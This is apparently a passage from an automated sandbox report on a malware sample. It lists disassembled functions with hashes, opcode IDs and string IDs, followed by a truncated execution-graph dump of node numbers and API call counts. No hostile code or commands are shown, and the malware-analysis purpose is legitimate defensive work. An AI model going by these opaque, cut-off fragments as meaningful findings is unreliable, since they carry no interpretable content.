                          • Instruction Fuzzy Hash: C06125B0A16709EBC749CF90E58A29DBFB2FB8A301F61D495C295E3194D73887A6C704
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02890AD0 Relevance: .1, Instructions: 129COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142688034.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b337cac3f3d4386cd791a8d033f22c097c1fe3eb70d45fbe3953a7fd0a716541
                          • Instruction ID: 9f8fc9f1c5228e6ccfc5405ab7b7d5b2157c441e292557240da865566339e7df
                          • Opcode Fuzzy Hash: b337cac3f3d4386cd791a8d033f22c097c1fe3eb70d45fbe3953a7fd0a716541
                          • Instruction Fuzzy Hash: E151F874E042198FDB14CFA9C9809AEFBF2FF89305F288169D418AB316D7359942CF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 07143258 Relevance: .1, Instructions: 101COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147443822.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: true
                          • Associated: 00000000.00000002.2147410922.0000000007130000.00000004.08000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7130000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f6923a906295547b24cc3aa9d6d272e20f7eb8650d3e7b867d82145c2ec26ec9
                          • Instruction ID: 260e3400ce313ddd37c6499b7fb51d14cd089dbf922f55b713b01d3eaaa5c9c8
                          • Opcode Fuzzy Hash: f6923a906295547b24cc3aa9d6d272e20f7eb8650d3e7b867d82145c2ec26ec9
                          • Instruction Fuzzy Hash: 6841C4B0E0560A9FDB48CFAAC4815AEFBF2BF89300F14D52AD525B7254D734AA418F94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CE3759 Relevance: 12.6, Strings: 10, Instructions: 97COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq
                          • API String ID: 0-1601297616
                          • Opcode ID: af6d4dcaa9a8ffdf0c36ddce10f5bee57965f749609aa69dec32943a678fb19f
                          • Instruction ID: 2f194181a2e025068f026ebec14a2938b6bbf3aa8a52fb4c5df769a540ec54bc
                          • Opcode Fuzzy Hash: af6d4dcaa9a8ffdf0c36ddce10f5bee57965f749609aa69dec32943a678fb19f
                          • Instruction Fuzzy Hash: 2541E170E0110A9FCF4AEFA8E9A05EEB7B3FF45300B505599D005BB2A6DB312D458F91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CE3768 Relevance: 12.6, Strings: 10, Instructions: 92COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq
                          • API String ID: 0-1601297616
                          • Opcode ID: 5b173353c84fca994af08a19764bf09169bc0b461ca8a648a6c6a823d6693cd2
                          • Instruction ID: 20c625f52a4b719fff344f5c88ca3a3553336f4d963293790be5469005007a9a
                          • Opcode Fuzzy Hash: 5b173353c84fca994af08a19764bf09169bc0b461ca8a648a6c6a823d6693cd2
                          • Instruction Fuzzy Hash: 8841CD70E0010A9FCF49EFA9E9905EEB7B7FF45300B505999D005BB2A5DB312D458F91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CEC800 Relevance: 5.0, Strings: 4, Instructions: 17COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID: LReq$LReq$$eq$$eq
                          • API String ID: 0-731573373
                          • Opcode ID: f50abc49b7baab41b5b048a320f410592897dbfebe14e3f96de11e307486af1f
                          • Instruction ID: 701c5522f9f831e32c50af3ed69aadc1a8f4824ddf38fded5a3a25199bc3ecff
                          • Opcode Fuzzy Hash: f50abc49b7baab41b5b048a320f410592897dbfebe14e3f96de11e307486af1f
                          • Instruction Fuzzy Hash: FDE05E31E00218EFDB18DBAAC8449EDBBF9EB8A710F0180BAE411B7344DB716D058BC0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CECB87 Relevance: 5.0, Strings: 4, Instructions: 12COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID: LReq$LReq$$eq$$eq
                          • API String ID: 0-731573373
                          • Opcode ID: da226f6a6dbe83f4826a0b23782fb1669a20566cd337d1ac308506320b37473e
                          • Instruction ID: 7ced4dfc3ec8033a362b9e58e5e53fd295be0c8e4fef04dce4ab671af7ecc4d0
                          • Opcode Fuzzy Hash: da226f6a6dbe83f4826a0b23782fb1669a20566cd337d1ac308506320b37473e
                          • Instruction Fuzzy Hash: 97D022A54080C8EECF06C23188967AE7F30AF05500F58428FD1E389102D3209106C3C4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CECBB0 Relevance: 5.0, Strings: 4, Instructions: 5COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID: LReq$LReq$$eq$$eq
                          • API String ID: 0-731573373
                          • Opcode ID: 746c04c9e2a171ca97f4ee2e264833942b2655703381a5ae31c901769c68c858
                          • Instruction ID: edd0947bdb38549bf0c64568376fd43af7b72d9aa04dc971610389d791e0a280
                          • Opcode Fuzzy Hash: 746c04c9e2a171ca97f4ee2e264833942b2655703381a5ae31c901769c68c858
                          • Instruction Fuzzy Hash: ABB01182808822C8E3B8022A8A8223AF020AB00000B000A03FAB3C808AE2208020A0EA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:31.7%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:4.4%
                          Total number of Nodes:1846
                          Total number of Limit Nodes:93
                          execution_graph 9703 40c640 9730 404bee 9703->9730 9706 40c70f 9707 404bee 6 API calls 9708 40c66b 9707->9708 9709 404bee 6 API calls 9708->9709 9715 40c708 9708->9715 9712 40c683 9709->9712 9710 402bab 2 API calls 9710->9706 9711 40c701 9714 402bab 2 API calls 9711->9714 9712->9711 9713 404bee 6 API calls 9712->9713 9718 40c694 9713->9718 9714->9715 9715->9710 9716 40c6f8 9717 402bab 2 API calls 9716->9717 9717->9711 9718->9716 9737 40c522 9718->9737 9720 40c6a9 9721 40c6ef 9720->9721 9723 405872 4 API calls 9720->9723 9722 402bab 2 API calls 9721->9722 9722->9716 9724 40c6c5 9723->9724 9725 405872 4 API calls 9724->9725 9726 40c6d5 9725->9726 9727 405872 4 API calls 9726->9727 9728 40c6e7 9727->9728 9729 402bab 2 API calls 9728->9729 9729->9721 9731 402b7c 2 API calls 9730->9731 9732 404bff 9731->9732 9733 404c3b 9732->9733 9734 4031e5 4 API calls 9732->9734 9733->9706 9733->9707 9735 404c28 9734->9735 9735->9733 9736 402bab 2 API calls 9735->9736 9736->9733 9738 402b7c 2 API calls 9737->9738 9739 40c542 9738->9739 9739->9720 9740 405941 9741 4031e5 4 API calls 9740->9741 9742 405954 9741->9742 8307 409046 8320 413b28 8307->8320 8309 40906d 8311 405b6f 6 API calls 8309->8311 8310 40904e 8310->8309 8312 403fbf 7 API calls 8310->8312 8313 40907c 8311->8313 8312->8309 8314 409092 8313->8314 8324 409408 8313->8324 8316 4090a3 8314->8316 8319 402bab 2 API calls 8314->8319 8318 402bab 2 API calls 8318->8314 8319->8316 8321 413b31 8320->8321 8322 413b38 8320->8322 8323 404056 6 API calls 8321->8323 8322->8310 8323->8322 8325 409413 8324->8325 8326 40908c 8325->8326 8338 409d36 8325->8338 8326->8318 8337 40945c 8444 40a35d 8337->8444 8339 409d43 8338->8339 8340 40a35d 4 API calls 8339->8340 8341 409d55 8340->8341 8342 4031e5 4 API calls 8341->8342 8343 409d8b 8342->8343 8344 4031e5 4 API calls 8343->8344 8345 409dd0 8344->8345 8346 405b6f 6 API calls 8345->8346 8377 409423 8345->8377 8349 409df7 8346->8349 8347 409e1c 8348 4031e5 4 API calls 8347->8348 8347->8377 8350 409e62 8348->8350 8349->8347 8351 402bab 2 API calls 8349->8351 8352 4031e5 4 API calls 8350->8352 8351->8347 8353 409e82 8352->8353 8354 4031e5 4 API calls 8353->8354 8355 409ea2 8354->8355 8356 4031e5 4 API calls 8355->8356 8357 409ec2 8356->8357 8358 4031e5 4 API calls 8357->8358 8359 409ee2 8358->8359 8360 4031e5 4 API calls 8359->8360 8361 409f02 8360->8361 8362 4031e5 4 API calls 8361->8362 8363 409f22 8362->8363 8364 4031e5 4 API calls 8363->8364 8367 409f42 8364->8367 8365 40a19b 8366 408b2c 4 API calls 8365->8366 8366->8377 8367->8365 8368 409fa3 8367->8368 8369 405b6f 6 API calls 8368->8369 8368->8377 8370 409fbd 8369->8370 8371 40a02c 8370->8371 8372 402bab 2 API calls 8370->8372 8373 4031e5 4 API calls 8371->8373 8399 40a16d 8371->8399 8375 409fd7 8372->8375 8376 40a070 8373->8376 8374 402bab 2 API calls 8374->8377 8378 405b6f 6 API calls 8375->8378 8379 4031e5 4 API calls 8376->8379 8377->8337 8400 4056bf 8377->8400 8381 409fe5 8378->8381 8380 40a090 8379->8380 8382 4031e5 4 API calls 8380->8382 8381->8371 8383 402bab 2 API calls 8381->8383 8384 40a0b0 8382->8384 8385 409fff 8383->8385 8388 4031e5 4 API calls 8384->8388 8386 405b6f 6 API calls 8385->8386 8387 40a00d 8386->8387 8387->8371 8390 40a021 8387->8390 8389 40a0d0 8388->8389 8392 4031e5 4 API calls 8389->8392 8391 402bab 2 API calls 8390->8391 8391->8377 8393 40a0f0 8392->8393 8394 4031e5 4 API calls 8393->8394 8396 40a110 8394->8396 8395 40a134 8395->8399 8454 408b2c 8395->8454 8396->8395 8397 4031e5 4 API calls 8396->8397 8397->8395 8399->8374 8399->8377 8401 402b7c 2 API calls 8400->8401 8402 4056cd 8401->8402 8403 4056d4 8402->8403 8404 402b7c 2 API calls 8402->8404 8405 408c4d 8403->8405 8404->8403 8406 413ba4 6 API calls 8405->8406 8407 408c5c 8406->8407 8408 408f02 8407->8408 8409 408f3a 8407->8409 8412 40903e 8407->8412 8411 405b6f 6 API calls 8408->8411 8410 405b6f 6 API calls 8409->8410 8426 408f51 8410->8426 8413 408f0c 8411->8413 8428 413aca 8412->8428 8413->8412 8417 408f31 8413->8417 8457 40a1b6 8413->8457 8415 405b6f 6 API calls 8415->8426 8416 402bab 2 API calls 8416->8412 8417->8416 8419 409031 8420 402bab 2 API calls 8419->8420 8420->8417 8421 409022 8422 402bab 2 API calls 8421->8422 8423 409028 8422->8423 8424 402bab 2 API calls 8423->8424 8424->8417 8425 402bab GetProcessHeap HeapFree 8425->8426 8426->8412 8426->8415 8426->8417 8426->8419 8426->8421 8426->8425 8427 40a1b6 14 API calls 8426->8427 8491 4044ee 8426->8491 8427->8426 8429 409451 8428->8429 8430 413ad7 8428->8430 8438 405695 8429->8438 8431 405781 4 API calls 8430->8431 8432 413af0 8431->8432 8433 405781 4 API calls 8432->8433 8434 413afe 8433->8434 8435 405762 4 API calls 8434->8435 8436 413b0e 8435->8436 8436->8429 8437 405781 4 API calls 8436->8437 8437->8429 8439 4056a0 8438->8439 8440 4056b9 8438->8440 8441 402bab 2 API calls 8439->8441 8440->8337 8442 4056b3 8441->8442 8443 402bab 2 API calls 8442->8443 8443->8440 8445 40a39a 8444->8445 8446 40a368 8444->8446 8447 4031e5 4 API calls 8445->8447 8449 40a3af 8445->8449 8450 4031e5 4 API calls 8446->8450 8447->8449 8448 40a3ca 8452 40a38a 8448->8452 8453 408b2c 4 API calls 8448->8453 8449->8448 8451 408b2c 4 API calls 8449->8451 8450->8452 8451->8448 8452->8326 8453->8452 8455 4031e5 4 API calls 8454->8455 8456 408b3e 8455->8456 8456->8399 8458 40a202 8457->8458 8459 40a1c3 8457->8459 8613 405f08 8458->8613 8460 405b6f 6 API calls 8459->8460 8463 40a1d0 8460->8463 8462 40a1fc 8462->8417 8463->8462 8466 40a1f3 8463->8466 8501 40a45b 8463->8501 8465 40a333 8467 402bab 2 API calls 8465->8467 8469 402bab 2 API calls 8466->8469 8467->8462 8469->8462 8470 405b6f 6 API calls 8472 40a245 8470->8472 8471 40a25d 8473 405b6f 6 API calls 8471->8473 8472->8471 8474 413a58 13 API calls 8472->8474 8479 40a26b 8473->8479 8475 40a257 8474->8475 8478 402bab 2 API calls 8475->8478 8476 40a28b 8477 405b6f 6 API calls 8476->8477 8484 40a297 8477->8484 8478->8471 8479->8476 8480 40a284 8479->8480 8620 40955b 8479->8620 8482 402bab 2 API calls 8480->8482 8482->8476 8483 405b6f 6 API calls 8488 40a2b7 8483->8488 8485 40a2b0 8484->8485 8484->8488 8627 40968e 8484->8627 8486 402bab 2 API calls 8485->8486 8486->8488 8488->8465 8488->8483 8490 402bab 2 API calls 8488->8490 8637 4098a7 8488->8637 8490->8488 8492 402b7c 2 API calls 8491->8492 8493 404512 8492->8493 8495 404585 GetLastError 8493->8495 8496 402bab 2 API calls 8493->8496 8499 40457c 8493->8499 8500 402b7c 2 API calls 8493->8500 8892 4044a7 8493->8892 8497 404592 8495->8497 8495->8499 8496->8493 8498 402bab 2 API calls 8497->8498 8498->8499 8499->8426 8500->8493 8646 40642c 8501->8646 8503 40a469 8504 40c4ff 8503->8504 8649 4047e6 8503->8649 8504->8466 8507 4040bb 12 API calls 8508 40bf88 8507->8508 8508->8504 8509 403c90 8 API calls 8508->8509 8510 40bfaa 8509->8510 8511 402b7c 2 API calls 8510->8511 8513 40bfc1 8511->8513 8512 40c4f3 8514 403f9e 5 API calls 8512->8514 8515 40c3aa 8513->8515 8656 40a423 8513->8656 8514->8504 8515->8512 8518 4056bf 2 API calls 8515->8518 8521 40c4e3 8515->8521 8516 402bab 2 API calls 8516->8512 8520 40c3d2 8518->8520 8520->8521 8523 4040bb 12 API calls 8520->8523 8521->8516 8522 405f08 4 API calls 8524 40c005 8522->8524 8525 40c3f3 8523->8525 8526 40c021 8524->8526 8659 40a43f 8524->8659 8528 40c4d1 8525->8528 8716 405a52 8525->8716 8527 4031e5 4 API calls 8526->8527 8530 40c034 8527->8530 8533 413aca 4 API calls 8528->8533 8539 4031e5 4 API calls 8530->8539 8534 40c4dd 8533->8534 8537 405695 2 API calls 8534->8537 8535 40c411 8721 405a87 8535->8721 8536 402bab 2 API calls 8536->8526 8537->8521 8545 40c04d 8539->8545 8540 40c4b3 8541 402bab 2 API calls 8540->8541 8543 40c4cb 8541->8543 8542 405a52 4 API calls 8553 40c423 8542->8553 8544 403f9e 5 API calls 8543->8544 8544->8528 8547 4031e5 4 API calls 8545->8547 8546 405a87 4 API calls 8546->8553 8548 40c085 8547->8548 8550 4031e5 4 API calls 8548->8550 8549 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8549->8553 8551 40c09c 8550->8551 8554 4031e5 4 API calls 8551->8554 8552 402bab 2 API calls 8552->8553 8553->8540 8553->8542 8553->8546 8553->8549 8553->8552 8555 40c0b3 8554->8555 8556 4031e5 4 API calls 8555->8556 8557 40c0ca 8556->8557 8558 4031e5 4 API calls 8557->8558 8559 40c0e7 8558->8559 8560 4031e5 4 API calls 8559->8560 8561 40c100 8560->8561 8562 4031e5 4 API calls 8561->8562 8563 40c119 8562->8563 8564 4031e5 4 API calls 8563->8564 8565 40c132 8564->8565 8566 4031e5 4 API calls 8565->8566 8567 40c14b 8566->8567 8568 4031e5 4 API calls 8567->8568 8569 40c164 8568->8569 8570 4031e5 4 API calls 8569->8570 8571 40c17d 8570->8571 8572 4031e5 4 API calls 8571->8572 8573 40c196 8572->8573 8574 4031e5 4 API calls 8573->8574 8575 40c1af 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c1c8 8576->8577 8578 4031e5 4 API calls 8577->8578 8579 40c1de 8578->8579 8580 4031e5 4 API calls 8579->8580 8581 40c1f4 8580->8581 8582 4031e5 4 API calls 8581->8582 8583 40c20d 8582->8583 8584 4031e5 4 API calls 8583->8584 8585 40c226 8584->8585 8586 4031e5 4 API calls 8585->8586 8587 40c23f 8586->8587 8588 4031e5 4 API calls 8587->8588 8589 40c258 8588->8589 8590 4031e5 4 API calls 8589->8590 8591 40c273 8590->8591 8592 4031e5 4 API calls 8591->8592 8593 40c28a 8592->8593 8594 4031e5 4 API calls 8593->8594 8597 40c2d5 8594->8597 8595 40c3a2 8596 402bab 2 API calls 8595->8596 8596->8515 8597->8595 8598 4031e5 4 API calls 8597->8598 8599 40c315 8598->8599 8600 40c38b 8599->8600 8662 404866 8599->8662 8601 403c40 5 API calls 8600->8601 8603 40c397 8601->8603 8605 403c40 5 API calls 8603->8605 8605->8595 8606 40c382 8608 403c40 5 API calls 8606->8608 8608->8600 8610 406c4c 6 API calls 8611 40c355 8610->8611 8611->8606 8686 4126a7 8611->8686 8614 4031e5 4 API calls 8613->8614 8615 405f1d 8614->8615 8616 405f55 8615->8616 8617 402b7c 2 API calls 8615->8617 8616->8462 8616->8465 8616->8470 8616->8471 8618 405f36 8617->8618 8618->8616 8619 4031e5 4 API calls 8618->8619 8619->8616 8621 409673 8620->8621 8626 40956d 8620->8626 8621->8480 8622 408b45 6 API calls 8622->8626 8623 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8623->8626 8624 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8624->8626 8625 402bab GetProcessHeap HeapFree 8625->8626 8626->8621 8626->8622 8626->8623 8626->8624 8626->8625 8628 4040bb 12 API calls 8627->8628 8636 4096a9 8628->8636 8629 40989f 8629->8485 8630 409896 8631 403f9e 5 API calls 8630->8631 8631->8629 8633 408b45 6 API calls 8633->8636 8634 402bab GetProcessHeap HeapFree 8634->8636 8635 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8635->8636 8636->8629 8636->8630 8636->8633 8636->8634 8636->8635 8885 4059d8 8636->8885 8638 4040bb 12 API calls 8637->8638 8644 4098c1 8638->8644 8639 4099fb 8639->8488 8640 4099f3 8641 403f9e 5 API calls 8640->8641 8641->8639 8642 4059d8 4 API calls 8642->8644 8643 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8643->8644 8644->8639 8644->8640 8644->8642 8644->8643 8645 402bab GetProcessHeap HeapFree 8644->8645 8645->8644 8647 4031e5 4 API calls 8646->8647 8648 406441 GetNativeSystemInfo 8647->8648 8648->8503 8650 4031e5 4 API calls 8649->8650 8654 40480a 8650->8654 8651 40485d 8651->8504 8651->8507 8652 4031e5 4 API calls 8652->8654 8653 40484f 8655 403c40 5 API calls 8653->8655 8654->8651 8654->8652 8654->8653 8655->8651 8657 4031e5 4 API calls 8656->8657 8658 40a435 8657->8658 8658->8522 8660 4031e5 4 API calls 8659->8660 8661 40a451 8660->8661 8661->8536 8663 4031e5 4 API calls 8662->8663 8664 40487c 8663->8664 8664->8606 8665 406c4c 8664->8665 8726 4068eb 8665->8726 8667 406e02 8667->8610 8668 406cab 8738 40469b 8668->8738 8669 406c6c 8669->8667 8669->8668 8735 406894 8669->8735 8676 406df1 8677 40469b 4 API calls 8676->8677 8677->8667 8678 406cef 8678->8676 8679 4031e5 4 API calls 8678->8679 8680 406d26 8679->8680 8680->8676 8681 40771e 6 API calls 8680->8681 8685 406d57 8681->8685 8682 406da2 8683 4031e5 4 API calls 8682->8683 8683->8676 8685->8682 8751 4068b0 8685->8751 8687 4126bb 8686->8687 8688 4126d1 8686->8688 8689 412840 8687->8689 8807 40488c 8687->8807 8688->8689 8813 407055 8688->8813 8689->8606 8693 412837 8695 403c40 5 API calls 8693->8695 8695->8689 8697 41281e 8698 4070ff 6 API calls 8697->8698 8698->8693 8699 407055 6 API calls 8700 412742 8699->8700 8700->8697 8701 40719a 6 API calls 8700->8701 8702 41276e 8701->8702 8703 412804 8702->8703 8829 406f4a 8702->8829 8857 4070ff 8703->8857 8706 41279a 8835 412553 8706->8835 8879 405907 8716->8879 8718 405a61 8719 405a76 8718->8719 8720 405907 4 API calls 8718->8720 8719->8535 8720->8718 8722 402b7c 2 API calls 8721->8722 8724 405a99 8722->8724 8725 405ade 8724->8725 8882 40595e 8724->8882 8725->8553 8754 4076a8 8726->8754 8728 406913 8729 406a61 8728->8729 8730 40771e 6 API calls 8728->8730 8729->8669 8734 406949 8730->8734 8731 40771e 6 API calls 8731->8734 8732 404678 4 API calls 8732->8734 8734->8729 8734->8731 8734->8732 8760 4046c2 8734->8760 8736 4031e5 4 API calls 8735->8736 8737 4068a6 8736->8737 8737->8669 8739 4046b4 8738->8739 8740 4046a4 8738->8740 8739->8667 8742 404678 8739->8742 8741 4031e5 4 API calls 8740->8741 8741->8739 8743 4031e5 4 API calls 8742->8743 8744 40468b 8743->8744 8744->8667 8745 40771e 8744->8745 8746 407737 8745->8746 8750 407748 8745->8750 8747 407644 6 API calls 8746->8747 8748 407741 8747->8748 8749 406baa 6 API calls 8748->8749 8749->8750 8750->8678 8752 4031e5 4 API calls 8751->8752 8753 4068c2 8752->8753 8753->8685 8755 4076c1 8754->8755 8759 4076d2 8754->8759 8768 407644 8755->8768 8759->8728 8761 4046d3 8760->8761 8762 4046d9 8760->8762 8803 40464c 8761->8803 8765 4046e9 8762->8765 8766 404678 4 API calls 8762->8766 8764 404714 8764->8734 8765->8764 8767 40469b 4 API calls 8765->8767 8766->8765 8767->8764 8769 407653 8768->8769 8770 407661 8768->8770 8769->8770 8776 406a6b 8769->8776 8772 406baa 8770->8772 8773 406bbb 8772->8773 8775 406bc8 8772->8775 8773->8775 8784 407402 8773->8784 8775->8759 8780 406a81 8776->8780 8777 402b7c 2 API calls 8777->8780 8778 406b8b 8778->8770 8779 406894 4 API calls 8779->8780 8780->8777 8780->8778 8780->8779 8781 406b96 8780->8781 8782 402bab 2 API calls 8780->8782 8783 402bab 2 API calls 8781->8783 8782->8780 8783->8778 8785 407644 6 API calls 8784->8785 8786 407412 8785->8786 8787 402b7c 2 API calls 8786->8787 8794 407450 8786->8794 8788 407483 8787->8788 8789 402b7c 2 API calls 8788->8789 8788->8794 8792 4074ce 8789->8792 8790 4074da 8791 4068cc 2 API calls 8790->8791 8791->8794 8792->8790 8793 402b7c 2 API calls 8792->8793 8797 40751f 8793->8797 8794->8775 8795 40752b 8796 4068cc 2 API calls 8795->8796 8796->8790 8797->8795 8799 4068cc 8797->8799 8800 4068d6 8799->8800 8801 4068e3 8799->8801 8800->8801 8802 402bab GetProcessHeap HeapFree 8800->8802 8801->8795 8802->8801 8804 404666 8803->8804 8805 404659 8803->8805 8804->8762 8806 4031e5 4 API calls 8805->8806 8806->8804 8808 4047e6 5 API calls 8807->8808 8809 404897 8808->8809 8810 40489c 8809->8810 8865 4047c7 8809->8865 8810->8688 8814 40706f 8813->8814 8815 407084 8813->8815 8814->8815 8816 407644 6 API calls 8814->8816 8820 4070e4 8815->8820 8868 406fd2 8815->8868 8817 40707d 8816->8817 8819 406baa 6 API calls 8817->8819 8819->8815 8820->8693 8821 40719a 8820->8821 8822 4071b0 8821->8822 8826 4071c5 8821->8826 8823 407644 6 API calls 8822->8823 8822->8826 8824 4071be 8823->8824 8825 406baa 6 API calls 8824->8825 8825->8826 8827 406fd2 4 API calls 8826->8827 8828 407226 8826->8828 8827->8828 8828->8697 8828->8699 8830 406f64 8829->8830 8834 406f75 8829->8834 8831 407644 6 API calls 8830->8831 8832 406f6e 8831->8832 8833 406baa 6 API calls 8832->8833 8833->8834 8834->8706 8876 4060ac 8835->8876 8858 407116 8857->8858 8859 40712b 8857->8859 8858->8859 8860 407644 6 API calls 8858->8860 8862 406fd2 4 API calls 8859->8862 8864 407187 8859->8864 8861 407124 8860->8861 8863 406baa 6 API calls 8861->8863 8862->8864 8863->8859 8864->8697 8866 4031e5 4 API calls 8865->8866 8867 4047d9 8866->8867 8867->8688 8869 406fde 8868->8869 8870 407027 8869->8870 8871 4031e5 4 API calls 8869->8871 8870->8820 8872 406ffa 8871->8872 8873 4031e5 4 API calls 8872->8873 8874 407011 8873->8874 8875 4031e5 4 API calls 8874->8875 8875->8870 8877 4031e5 4 API calls 8876->8877 8878 4060bb 8877->8878 8878->8878 8880 4031e5 4 API calls 8879->8880 8881 40591a 8880->8881 8881->8718 8883 4031e5 4 API calls 8882->8883 8884 405971 8883->8884 8884->8724 8886 4031e5 4 API calls 8885->8886 8887 4059ed 8886->8887 8888 402b7c 2 API calls 8887->8888 8891 405a38 8887->8891 8889 405a16 8888->8889 8890 4031e5 4 API calls 8889->8890 8889->8891 8890->8891 8891->8636 8893 4031e5 4 API calls 8892->8893 8894 4044b9 8893->8894 8894->8493 9814 40a349 9815 4098a7 13 API calls 9814->9815 9816 40a359 9815->9816 9053 408952 9074 40823f 9053->9074 9056 408960 9058 4056bf 2 API calls 9056->9058 9059 40896a 9058->9059 9102 408862 9059->9102 9061 413aca 4 API calls 9062 4089d4 9061->9062 9064 405695 2 API calls 9062->9064 9063 408975 9071 4089c4 9063->9071 9110 4087d6 9063->9110 9066 4089df 9064->9066 9071->9061 9072 402bab 2 API calls 9073 40899d 9072->9073 9073->9071 9073->9072 9075 40824d 9074->9075 9076 40831b 9075->9076 9077 4031e5 4 API calls 9075->9077 9076->9056 9090 4083bb 9076->9090 9078 40826d 9077->9078 9079 4031e5 4 API calls 9078->9079 9080 408289 9079->9080 9081 4031e5 4 API calls 9080->9081 9082 4082a5 9081->9082 9083 4031e5 4 API calls 9082->9083 9084 4082c1 9083->9084 9085 4031e5 4 API calls 9084->9085 9086 4082e2 9085->9086 9087 4031e5 4 API calls 9086->9087 9088 4082ff 9087->9088 9089 4031e5 4 API calls 9088->9089 9089->9076 9138 408363 9090->9138 9093 4056bf 2 API calls 9099 4083f4 9093->9099 9094 413aca 4 API calls 9095 4084a0 9094->9095 9096 405695 2 API calls 9095->9096 9097 4084ab 9096->9097 9097->9056 9098 408492 9098->9094 9099->9098 9141 40815d 9099->9141 9156 40805d 9099->9156 9171 404b8f 9102->9171 9104 408946 9104->9063 9105 40887e 9105->9104 9106 4031e5 4 API calls 9105->9106 9107 40893e 9105->9107 9109 402b7c 2 API calls 9105->9109 9106->9105 9174 404a39 9107->9174 9109->9105 9111 402b7c 2 API calls 9110->9111 9112 4087e7 9111->9112 9113 4031e5 4 API calls 9112->9113 9118 40885a 9112->9118 9116 408802 9113->9116 9114 408853 9115 402bab 2 API calls 9114->9115 9115->9118 9116->9114 9119 40884d 9116->9119 9183 408522 9116->9183 9187 4084b4 9116->9187 9122 408749 9118->9122 9190 4084d4 9119->9190 9123 404b8f 5 API calls 9122->9123 9127 408765 9123->9127 9124 4031e5 4 API calls 9124->9127 9125 408522 4 API calls 9125->9127 9126 4087c7 9128 404a39 5 API calls 9126->9128 9127->9124 9127->9125 9127->9126 9129 4087cf 9127->9129 9128->9129 9130 4085d1 9129->9130 9131 4085e9 9130->9131 9133 4086c2 9130->9133 9131->9133 9134 402bab 2 API calls 9131->9134 9135 4031e5 4 API calls 9131->9135 9196 4089e6 9131->9196 9215 4086c9 9131->9215 9219 4036a3 9131->9219 9133->9073 9134->9131 9135->9131 9139 4031e5 4 API calls 9138->9139 9140 408386 9139->9140 9140->9093 9140->9097 9142 40816f 9141->9142 9143 4081b6 9142->9143 9144 4081fd 9142->9144 9155 4081ef 9142->9155 9146 405872 4 API calls 9143->9146 9145 405872 4 API calls 9144->9145 9148 408213 9145->9148 9147 4081cf 9146->9147 9149 405872 4 API calls 9147->9149 9150 405872 4 API calls 9148->9150 9151 4081df 9149->9151 9152 408222 9150->9152 9153 405872 4 API calls 9151->9153 9154 405872 4 API calls 9152->9154 9153->9155 9154->9155 9155->9099 9157 40808c 9156->9157 9158 4080d2 9157->9158 9159 408119 9157->9159 9170 40810b 9157->9170 9161 405872 4 API calls 9158->9161 9160 405872 4 API calls 9159->9160 9162 40812f 9160->9162 9163 4080eb 9161->9163 9165 405872 4 API calls 9162->9165 9164 405872 4 API calls 9163->9164 9166 4080fb 9164->9166 9167 40813e 9165->9167 9168 405872 4 API calls 9166->9168 9169 405872 4 API calls 9167->9169 9168->9170 9169->9170 9170->9099 9177 404a19 9171->9177 9173 